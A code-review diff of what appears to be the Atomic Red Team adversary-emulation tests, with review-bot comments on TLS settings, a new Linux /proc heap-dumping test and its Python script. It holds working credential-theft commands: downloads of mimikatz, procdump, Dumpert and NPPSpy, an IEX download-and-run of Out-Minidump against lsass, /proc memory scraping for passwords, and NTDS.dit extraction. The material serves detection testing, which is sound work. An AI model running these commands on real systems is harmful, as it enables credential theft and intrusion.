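Review bot: The added `[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12` line assigns the protocol set instead of extending it, so whatever the runtime already had enabled (on newer .NET/Windows builds the OS default set, which can include TLS 1.3) is discarded for the rest of that PowerShell process; `[Net.ServicePointManager]::SecurityProtocol = [Net.ServicePointManager]::SecurityProtocol -bor [Net.SecurityProtocolType]::Tls12` keeps TLS 1.2 available without narrowing the set. The same line is added in the remaining T1003.001.yaml hunks (procdump, dumpert, mimikatz, Out-Minidump, xordump) and in the T1003.yaml NPPSpy hunk, so the change would apply to all of them. Each get_prereq_command is visible in full here, but the enclosing test definitions start and end outside the hunk.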
@@ -78,6 +79,7 @@ atomic_tests:
prereq_command: |
if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}
get_prereq_command: |
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip"
Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force
New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null
@@ -129,6 +131,7 @@ atomic_tests:
prereq_command: |
if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1}
get_prereq_command: |
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -ItemType Directory (Split-Path #{dumpert_exe}) -Force | Out-Null
Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe" -OutFile #{dumpert_exe}
executor:
@@ -183,6 +186,7 @@ atomic_tests:
prereq_command: |
if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}
get_prereq_command: |
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$url = 'https://github.com/gentilkiwi/mimikatz/releases/latest'
$request = [System.Net.WebRequest]::Create($url)
$response = $request.GetResponse()
@@ -256,6 +260,7 @@ atomic_tests:
- windows
executor:
command: |
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump
cleanup_command: |
Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore
@@ -382,6 +387,7 @@ atomic_tests:
prereq_command: |
if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1}
get_prereq_command: |
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe}
executor:
command: |
diff --git a/atomics/T1003.002/T1003.002.md b/atomics/T1003.002/T1003.002.md
index 1516c1da..ad162a55 100644
--- a/atomics/T1003.002/T1003.002.md
+++ b/atomics/T1003.002/T1003.002.md
@@ -44,6 +44,10 @@ Upon successful execution of this test, you will find three files named, sam, sy
**Supported Platforms:** Windows
+**auto_generated_guid:** 5c2571d0-1572-416d-9676-812e64ca9f44
+
+
+
@@ -76,6 +80,10 @@ Parses registry hives to obtain stored credentials
**Supported Platforms:** Windows
+**auto_generated_guid:** a96872b2-cbf3-46cf-8eb4-27e8c0e85263
+
+
+
@@ -94,7 +102,7 @@ pypykatz live registry
##### Check Prereq Commands:
```cmd
py -3 --version >nul 2>&1
-exit /b %errorlevel%
+exit /b %errorlevel%
```
##### Get Prereq Commands:
```cmd
@@ -104,7 +112,7 @@ echo "Python 3 must be installed manually"
##### Check Prereq Commands:
```cmd
py -3 -m pip --version >nul 2>&1
-exit /b %errorlevel%
+exit /b %errorlevel%
```
##### Get Prereq Commands:
```cmd
@@ -114,7 +122,7 @@ echo "PIP must be installed manually"
##### Check Prereq Commands:
```cmd
pypykatz -h >nul 2>&1
-exit /b %errorlevel%
+exit /b %errorlevel%
```
##### Get Prereq Commands:
```cmd
@@ -134,10 +142,14 @@ This can also be used to copy other files and hives like SYSTEM, NTUSER.dat etc.
**Supported Platforms:** Windows
+**auto_generated_guid:** a90c2f4d-6726-444e-99d2-a00cd7c20480
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_path | Path to the file to copy | Path | %SystemRoot%/system32/config/SAM|
| file_name | Name of the copied file | String | SAM|
@@ -169,6 +181,10 @@ Executes a hashdump by reading the hasshes from the registry.
**Supported Platforms:** Windows
+**auto_generated_guid:** 804f28fc-68fc-40da-b5a2-e9d0bce5c193
+
+
+
diff --git a/atomics/T1003.003/T1003.003.md b/atomics/T1003.003/T1003.003.md
index 60657899..a82206f8 100644
--- a/atomics/T1003.003/T1003.003.md
+++ b/atomics/T1003.003/T1003.003.md
@@ -37,10 +37,14 @@ The Active Directory database NTDS.dit may be dumped by copying it from a Volume
**Supported Platforms:** Windows
+**auto_generated_guid:** dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| drive_letter | Drive letter to source VSC (including colon) | String | C:|
@@ -59,7 +63,7 @@ vssadmin.exe create shadow /for=#{drive_letter}
##### Description: Target must be a Domain Controller
##### Check Prereq Commands:
```cmd
-reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
+reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
```
##### Get Prereq Commands:
```cmd
@@ -84,10 +88,14 @@ This test must be executed on a Windows Domain Controller.
**Supported Platforms:** Windows
+**auto_generated_guid:** c6237146-9ea6-4711-85c9-c56d263a6b03
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| vsc_name | Name of Volume Shadow Copy | String | \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1|
| extract_path | Path for extracted NTDS.dit | Path | C:\Windows\Temp|
@@ -115,7 +123,7 @@ del "#{extract_path}\SYSTEM_HIVE" >nul 2> nul
##### Description: Target must be a Domain Controller
##### Check Prereq Commands:
```cmd
-reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
+reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
```
##### Get Prereq Commands:
```cmd
@@ -124,7 +132,7 @@ echo Sorry, Promoting this machine to a Domain Controller must be done manually
##### Description: Volume shadow copy must exist
##### Check Prereq Commands:
```cmd
-if not exist #{vsc_name} (exit /b 1)
+if not exist #{vsc_name} (exit /b 1)
```
##### Get Prereq Commands:
```cmd
@@ -133,7 +141,7 @@ echo Run "Invoke-AtomicTest T1003.003 -TestName 'Create Volume Shadow Copy with
##### Description: Extract path must exist
##### Check Prereq Commands:
```cmd
-if not exist #{extract_path} (exit /b 1)
+if not exist #{extract_path} (exit /b 1)
```
##### Get Prereq Commands:
```cmd
@@ -158,10 +166,14 @@ Upon successful completion, you will find a copy of the ntds.dit file in the C:\
**Supported Platforms:** Windows
+**auto_generated_guid:** 2364e33d-ceab-4641-8468-bfb1d7cc2723
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_folder | Path where resulting dump should be placed | Path | C:\Windows\Temp\ntds_T1003|
@@ -185,7 +197,7 @@ rmdir /q /s #{output_folder} >nul 2>&1
##### Description: Target must be a Domain Controller
##### Check Prereq Commands:
```cmd
-reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
+reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
```
##### Get Prereq Commands:
```cmd
@@ -206,10 +218,14 @@ The Active Directory database NTDS.dit may be dumped by copying it from a Volume
**Supported Platforms:** Windows
+**auto_generated_guid:** 224f7de0-8f0a-4a94-b5d8-989b036c86da
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| drive_letter | Drive letter to source VSC (including colon) | String | C:|
@@ -228,7 +244,7 @@ wmic shadowcopy call create Volume=#{drive_letter}
##### Description: Target must be a Domain Controller
##### Check Prereq Commands:
```cmd
-reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
+reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
```
##### Get Prereq Commands:
```cmd
@@ -249,10 +265,14 @@ The Active Directory database NTDS.dit may be dumped by copying it from a Volume
**Supported Platforms:** Windows
+**auto_generated_guid:** 542bb97e-da53-436b-8e43-e0a7d31a6c24
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| drive_letter | Drive letter to source VSC (including colon) | String | C:|
@@ -280,10 +300,14 @@ The Active Directory database NTDS.dit may be dumped by creating a symlink to Vo
**Supported Platforms:** Windows
+**auto_generated_guid:** 21748c28-2793-4284-9e07-d6d028b66702
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| drive_letter | Drive letter to source VSC (including colon) | String | C:|
| symlink_path | symlink path | String | C:\Temp\vssstore|
diff --git a/atomics/T1003.004/T1003.004.md b/atomics/T1003.004/T1003.004.md
index 244802ff..15260a63 100644
--- a/atomics/T1003.004/T1003.004.md
+++ b/atomics/T1003.004/T1003.004.md
@@ -20,10 +20,14 @@ https://pentestlab.blog/2018/04/04/dumping-clear-text-credentials/#:~:text=LSA%2
**Supported Platforms:** Windows
+**auto_generated_guid:** 55295ab0-a703-433b-9ca4-ae13807de12f
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| psexec_exe | Path to PsExec executable | Path | PathToAtomicsFolder\T1003.004\bin\PsExec.exe|
@@ -46,7 +50,7 @@ del %temp%\secrets >nul 2> nul
##### Description: PsExec from Sysinternals must exist on disk at specified location (#{psexec_exe})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{psexec_exe}) {exit 0} else {exit 1}
+if (Test-Path #{psexec_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
diff --git a/atomics/T1003.006/T1003.006.md b/atomics/T1003.006/T1003.006.md
index f86b639b..c9efc3ad 100644
--- a/atomics/T1003.006/T1003.006.md
+++ b/atomics/T1003.006/T1003.006.md
@@ -22,10 +22,14 @@ Privileges required: domain admin or domain controller account (by default), or
**Supported Platforms:** Windows
+**auto_generated_guid:** 129efd28-8497-4c87-a1b0-73b9a870ca3e
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| domain | Targeted domain | string | example.com|
| user | Targeted user | string | krbtgt|
@@ -47,7 +51,7 @@ Privileges required: domain admin or domain controller account (by default), or
##### Check Prereq Commands:
```powershell
$mimikatz_path = cmd /c echo #{mimikatz_path}
-if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
+if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
diff --git a/atomics/T1003.007/T1003.007.md b/atomics/T1003.007/T1003.007.md
new file mode 100644
index 00000000..d2d5875d
--- /dev/null
+++ b/atomics/T1003.007/T1003.007.md
@@ -0,0 +1,142 @@
+# T1003.007 - Proc Filesystem
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/007)
+
Adversaries may gather credentials from information stored in the Proc filesystem or /proc. The Proc filesystem on Linux contains a great deal of information regarding the state of the running operating system. Processes running with root privileges can use this facility to scrape live memory of other running programs. If any of these programs store passwords in clear text or password hashes in memory, these values can then be harvested for either usage or brute force attacks, respectively.
+
+This functionality has been implemented in the MimiPenguin(Citation: MimiPenguin GitHub May 2017), an open source tool inspired by Mimikatz. The tool dumps process memory, then harvests passwords and hashes by looking for text strings and regex patterns for how given applications such as Gnome Keyring, sshd, and Apache use memory to store such authentication artifacts.
+
+## Atomic Tests
+
+- [Atomic Test #1 - Dump individual process memory with sh (Local)](#atomic-test-1---dump-individual-process-memory-with-sh-local)
+
+- [Atomic Test #2 - Dump individual process memory with Python (Local)](#atomic-test-2---dump-individual-process-memory-with-python-local)
+
+
+
+
+## Atomic Test #1 - Dump individual process memory with sh (Local)
+Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to
+copy process memory to an external file so it can be searched or exfiltrated later.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 7e91138a-8e74-456d-a007-973d67a0bb80
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| output_file | Path where captured results will be placed | Path | /tmp/T1003.007.bin|
+| script_path | Path to script generating the target process | Path | /tmp/T1003.007.sh|
+| pid_term | Unique string to use to identify target process | String | T1003.007|
+
+
+#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
+
+
+```sh
+sh #{script_path}
+PID=$(pgrep -n -f "#{pid_term}")
+HEAP_MEM=$(grep -E "^[0-9a-f-]* r" /proc/"$PID"/maps | grep heap | cut -d' ' -f 1)
+MEM_START=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f1))))
+MEM_STOP=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f2))))
+MEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START)))
+dd if=/proc/"${PID}"/mem of="#{output_file}" ibs=1 skip="$MEM_START" count="$MEM_SIZE"
+grep -i "PASS" "#{output_file}"
+```
+
+#### Cleanup Commands:
+```sh
+rm -f "#{output_file}"
+```
+
+
+
+#### Dependencies: Run with `sh`!
+##### Description: Script to launch target process must exist
+##### Check Prereq Commands:
+```sh
+test -f #{script_path}
+grep "#{pid_term}" #{script_path}
+```
+##### Get Prereq Commands:
+```sh
+echo '#!/bin/sh' > #{script_path}
+echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
+```
+
+
+
+
+
+
+
+## Atomic Test #2 - Dump individual process memory with Python (Local)
+Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script to
+copy a process's heap memory to an external file so it can be searched or exfiltrated later.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 437b2003-a20d-4ed8-834c-4964f24eec63
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| output_file | Path where captured results will be placed | Path | /tmp/T1003.007.bin|
+| script_path | Path to script generating the target process | Path | /tmp/T1003.007.sh|
+| python_script | Path to script generating the target process | Path | PathToAtomicsFolder/T1003.007/src/dump_heap.py|
+| pid_term | Unique string to use to identify target process | String | T1003.007|
+
+
+#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
+
+
+```sh
+sh #{script_path}
+PID=$(pgrep -n -f "#{pid_term}")
+PYTHON=$(which python || which python3 || which python2)
+$PYTHON #{python_script} $PID #{output_file}
+grep -i "PASS" "#{output_file}"
+```
+
+#### Cleanup Commands:
+```sh
+rm -f "#{output_file}"
+```
+
+
+
+#### Dependencies: Run with `sh`!
+##### Description: Script to launch target process must exist
+##### Check Prereq Commands:
+```sh
+test -f #{script_path}
+grep "#{pid_term}" #{script_path}
+```
+##### Get Prereq Commands:
+```sh
+echo '#!/bin/sh' > #{script_path}
+echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
+```
+##### Description: Requires Python
+##### Check Prereq Commands:
+```sh
+(which python || which python3 || which python2)
+```
+##### Get Prereq Commands:
+```sh
+echo "Python 2.7+ or 3.4+ must be installed"
+```
+
+
+
+
+
diff --git a/atomics/T1003.007/T1003.007.yaml b/atomics/T1003.007/T1003.007.yaml
new file mode 100644
index 00000000..fbadc564
--- /dev/null
+++ b/atomics/T1003.007/T1003.007.yaml
@@ -0,0 +1,106 @@
+---
+attack_technique: T1003.007
+display_name: 'OS Credential Dumping: Proc Filesystem'
+atomic_tests:
+- name: Dump individual process memory with sh (Local)
+ auto_generated_guid: 7e91138a-8e74-456d-a007-973d67a0bb80
+ description: |
+ Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to
+ copy process memory to an external file so it can be searched or exfiltrated later.
+
+ supported_platforms:
+ - linux
+
+ input_arguments:
+ output_file:
+ description: Path where captured results will be placed
+ type: Path
+ default: /tmp/T1003.007.bin
+ script_path:
+ description: Path to script generating the target process
+ type: Path
+ default: /tmp/T1003.007.sh
+ pid_term:
+ description: Unique string to use to identify target process
+ type: String
+ default: T1003.007
+
+ dependencies:
+ - description: |
+ Script to launch target process must exist
+ prereq_command: |
+ test -f #{script_path}
+ grep "#{pid_term}" #{script_path}
+ get_prereq_command: |
+ echo '#!/bin/sh' > #{script_path}
+ echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
+
+ executor:
+ name: sh
+ elevation_required: true
+ command: |
+ sh #{script_path}
+ PID=$(pgrep -n -f "#{pid_term}")
+ HEAP_MEM=$(grep -E "^[0-9a-f-]* r" /proc/"$PID"/maps | grep heap | cut -d' ' -f 1)
+ MEM_START=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f1))))
+ MEM_STOP=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f2))))
+ MEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START)))
+ dd if=/proc/"${PID}"/mem of="#{output_file}" ibs=1 skip="$MEM_START" count="$MEM_SIZE"
+ grep -i "PASS" "#{output_file}"
+ cleanup_command: |
+ rm -f "#{output_file}"
+
+- name: Dump individual process memory with Python (Local)
+ auto_generated_guid: 437b2003-a20d-4ed8-834c-4964f24eec63
+ description: |
+ Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script to
+ copy a process's heap memory to an external file so it can be searched or exfiltrated later.
+
+ supported_platforms:
+ - linux
+
+ input_arguments:
+ output_file:
+ description: Path where captured results will be placed
+ type: Path
+ default: /tmp/T1003.007.bin
+ script_path:
+ description: Path to script generating the target process
+ type: Path
+ default: /tmp/T1003.007.sh
+ python_script:
+ description: Path to script generating the target process
+ type: Path
+ default: PathToAtomicsFolder/T1003.007/src/dump_heap.py
+ pid_term:
+ description: Unique string to use to identify target process
+ type: String
+ default: T1003.007
+
+ dependencies:
+ - description: |
+ Script to launch target process must exist
+ prereq_command: |
+ test -f #{script_path}
+ grep "#{pid_term}" #{script_path}
+ get_prereq_command: |
+ echo '#!/bin/sh' > #{script_path}
+ echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
+ - description: |
+ Requires Python
+ prereq_command: |
+ (which python || which python3 || which python2)
+ get_prereq_command: |
+ echo "Python 2.7+ or 3.4+ must be installed"
+
+ executor:
+ name: sh
+ elevation_required: true
+ command: |
+ sh #{script_path}
+ PID=$(pgrep -n -f "#{pid_term}")
+ PYTHON=$(which python || which python3 || which python2)
+ $PYTHON #{python_script} $PID #{output_file}
+ grep -i "PASS" "#{output_file}"
+ cleanup_command: |
+ rm -f "#{output_file}"
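Review bot: The `python_script` input's description, `Path to script generating the target process`, is copied from `script_path` and describes the wrong file; it should read `description: Path to the Python script that copies the target process heap to disk` (the generated T1003.007.md repeats the copied text). The second test's dependency advertises `Python 2.7+ or 3.4+ must be installed` and the executor resolves `which python` before `python3`, yet the script this commit adds at atomics/T1003.007/src/dump_heap.py uses `next(filter(...))`, which fails on Python 2 where `filter` returns a list, so the requirement and prereq check should be narrowed to Python 3 (`echo "Python 3.4+ must be installed"`, with `which python3` tried first) unless the script is made 2/3-compatible. Both tests' cleanup_command removes only `#{output_file}` while the helper script written by get_prereq_command at `#{script_path}` is left on disk; `rm -f "#{output_file}" "#{script_path}"` would return the host to its prior state.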
diff --git a/atomics/T1003.007/src/dump_heap.py b/atomics/T1003.007/src/dump_heap.py
new file mode 100644
index 00000000..34d479c7
--- /dev/null
+++ b/atomics/T1003.007/src/dump_heap.py
@@ -0,0 +1,31 @@
+#!/usr/bin/env python
+'''Dump a process's heap space to disk
+
+Usage:
+ python dump_proc.py
+'''
+import argparse
+
+
+parser = argparse.ArgumentParser(description='Dump a process\'s heap space to disk')
+parser.add_argument('pid', type=int, help='ID of process to dump')
+parser.add_argument('filepath', help='A filepath to save output to')
+args = parser.parse_args()
+
+process_id = args.pid
+output_file = args.filepath
+
+with open("/proc/{}/maps".format(process_id), "r") as maps_file:
+ # example: 5566db1a6000-5566db4f0000 rw-p 00000000 00:00 0 [heap]
+ heap_line = next(filter(lambda line: "[heap]" in line, maps_file))
+ heap_range = heap_line.split(' ')[0]
+ mem_start = int(heap_range.split('-')[0], 16)
+ mem_stop = int(heap_range.split('-')[1], 16)
+ mem_size = mem_stop - mem_start
+
+with open("/proc/{}/mem".format(process_id), "rb") as mem_file:
+ mem_file.seek(mem_start, 0)
+ heap_mem = mem_file.read(mem_size)
+
+with open(output_file, "wb") as ofile:
+ ofile.write(heap_mem)
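Review bot: The module docstring's usage line `python dump_proc.py` names a different file and omits the two required positional arguments the argparse definition below declares; it should read `python dump_heap.py <pid> <filepath>`. `heap_line = next(filter(lambda line: "[heap]" in line, maps_file))` only runs on Python 3 (on Python 2 `filter` returns a list and `next()` raises TypeError), which contradicts the Python 2.7+ requirement stated in the accompanying T1003.007.yaml; `heap_line = next(line for line in maps_file if "[heap]" in line)` behaves the same on both. When the target has no `[heap]` mapping the same call raises an uncaught StopIteration, so the test ends with a traceback rather than a message naming the cause.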
diff --git a/atomics/T1003.008/T1003.008.md b/atomics/T1003.008/T1003.008.md
index 52491f16..496d6d4c 100644
--- a/atomics/T1003.008/T1003.008.md
+++ b/atomics/T1003.008/T1003.008.md
@@ -20,10 +20,14 @@ The Linux utility, unshadow, can be used to combine the two files in a format su
**Supported Platforms:** Linux
+**auto_generated_guid:** 3723ab77-c546-403c-8fb4-bb577033b235
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | Path | /tmp/T1003.008.txt|
@@ -54,10 +58,14 @@ rm -f #{output_file}
**Supported Platforms:** Linux
+**auto_generated_guid:** 60e860b6-8ae6-49db-ad07-5e73edd88f5d
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | Path | /tmp/T1003.008.txt|
diff --git a/atomics/T1003/T1003.md b/atomics/T1003/T1003.md
index f716aaf5..f7c73c92 100644
--- a/atomics/T1003/T1003.md
+++ b/atomics/T1003/T1003.md
@@ -27,10 +27,14 @@ If you see a message saying "The system cannot find the path specified", try usi
**Supported Platforms:** Windows
+**auto_generated_guid:** 96345bfc-8ae7-4b6a-80b7-223200f24ef9
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| gsecdump_exe | Path to the Gsecdump executable | Path | PathToAtomicsFolder\T1003\bin\gsecdump.exe|
| gsecdump_bin_hash | File hash of the Gsecdump binary file | String | 94CAE63DCBABB71C5DD43F55FD09CAEFFDCD7628A02A112FB3CBA36698EF72BC|
@@ -51,7 +55,7 @@ If you see a message saying "The system cannot find the path specified", try usi
##### Description: Gsecdump must exist on disk at specified location (#{gsecdump_exe})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{gsecdump_exe}) {exit 0} else {exit 1}
+if (Test-Path #{gsecdump_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -78,6 +82,10 @@ NPPSpy Source: https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NP
**Supported Platforms:** Windows
+**auto_generated_guid:** 9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6
+
+
+
@@ -114,10 +122,11 @@ Remove-Item C:\Windows\System32\NPPSpy.dll -ErrorAction Ignore
##### Description: NPPSpy.dll must be available in local temp directory
##### Check Prereq Commands:
```powershell
-if (Test-Path "$env:Temp\NPPSPY.dll") {exit 0} else {exit 1}
+if (Test-Path "$env:Temp\NPPSPY.dll") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "$env:Temp\NPPSPY.dll"
```
diff --git a/atomics/T1003/T1003.yaml b/atomics/T1003/T1003.yaml
index 911859c6..d622c125 100644
--- a/atomics/T1003/T1003.yaml
+++ b/atomics/T1003/T1003.yaml
@@ -61,6 +61,7 @@ atomic_tests:
- description: NPPSpy.dll must be available in local temp directory
prereq_command: if (Test-Path "$env:Temp\NPPSPY.dll") {exit 0} else {exit 1}
get_prereq_command: |-
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "$env:Temp\NPPSPY.dll"
executor:
command: |-
diff --git a/atomics/T1006/T1006.md b/atomics/T1006/T1006.md
index 5a6e5d8d..19a34276 100644
--- a/atomics/T1006/T1006.md
+++ b/atomics/T1006/T1006.md
@@ -25,10 +25,14 @@ For a NTFS volume, it should correspond to the following sequence ([NTFS partiti
**Supported Platforms:** Windows
+**auto_generated_guid:** 88f6327e-51ec-4bbf-b2e8-3fea534eab8b
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| volume | Drive letter of the volume to access | string | C:|
diff --git a/atomics/T1007/T1007.md b/atomics/T1007/T1007.md
index d08caf66..faff45d6 100644
--- a/atomics/T1007/T1007.md
+++ b/atomics/T1007/T1007.md
@@ -19,6 +19,10 @@ Upon successful execution, cmd.exe will execute service commands with expected r
**Supported Platforms:** Windows
+**auto_generated_guid:** 89676ba1-b1f8-47ee-b940-2e1a113ebc71
+
+
+
@@ -47,10 +51,14 @@ Upon successful execution, net.exe will run from cmd.exe that queries services.
**Supported Platforms:** Windows
+**auto_generated_guid:** 5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path of file to hold net.exe output | Path | C:\Windows\Temp\service-list.txt|
diff --git a/atomics/T1010/T1010.md b/atomics/T1010/T1010.md
index c8263dd5..8655b46f 100644
--- a/atomics/T1010/T1010.md
+++ b/atomics/T1010/T1010.md
@@ -17,10 +17,14 @@ Upon successful execution, powershell will download the .cs from the Atomic Red
**Supported Platforms:** Windows
+**auto_generated_guid:** fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_source_code | Path to source of C# code | path | PathToAtomicsFolder\T1010\src\T1010.cs|
| output_file_name | Name of output binary | string | %TEMP%\T1010.exe|
@@ -45,7 +49,7 @@ del /f /q /s #{output_file_name} >nul 2>&1
##### Description: T1010.cs must exist on disk at specified location (#{input_source_code})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{input_source_code}) {exit 0} else {exit 1}
+if (Test-Path #{input_source_code}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
diff --git a/atomics/T1012/T1012.md b/atomics/T1012/T1012.md
index 58233009..272ee9ac 100644
--- a/atomics/T1012/T1012.md
+++ b/atomics/T1012/T1012.md
@@ -23,6 +23,10 @@ https://www.offensive-security.com/wp-content/uploads/2015/04/wp.Registry_Quick_
**Supported Platforms:** Windows
+**auto_generated_guid:** 8f7578c4-9863-4d83-875c-a565573bbdf0
+
+
+
diff --git a/atomics/T1014/T1014.md b/atomics/T1014/T1014.md
index e9f81566..43f2a795 100644
--- a/atomics/T1014/T1014.md
+++ b/atomics/T1014/T1014.md
@@ -21,10 +21,14 @@ Loadable Kernel Module based Rootkit
**Supported Platforms:** Linux
+**auto_generated_guid:** dfb50072-e45a-4c75-a17e-a484809c8553
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| rootkit_source_path | Path to the rootkit source. Used when prerequistes are fetched. | path | PathToAtomicsFolder/T1014/src/Linux|
| rootkit_path | Path To rootkit | String | PathToAtomicsFolder/T1014/bin/T1014.ko|
@@ -50,7 +54,7 @@ sudo rmmod #{rootkit_name}
##### Description: The kernel module must exist on disk at specified location (#{rootkit_path})
##### Check Prereq Commands:
```bash
-if [ -f #{rootkit_path} ]; then exit 0; else exit 1; fi;
+if [ -f #{rootkit_path} ]; then exit 0; else exit 1; fi;
```
##### Get Prereq Commands:
```bash
@@ -73,10 +77,14 @@ Loadable Kernel Module based Rootkit
**Supported Platforms:** Linux
+**auto_generated_guid:** 75483ef8-f10f-444a-bf02-62eb0e48db6f
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| rootkit_source_path | Path to the rootkit source. Used when prerequistes are fetched. | path | PathToAtomicsFolder/T1014/src/Linux|
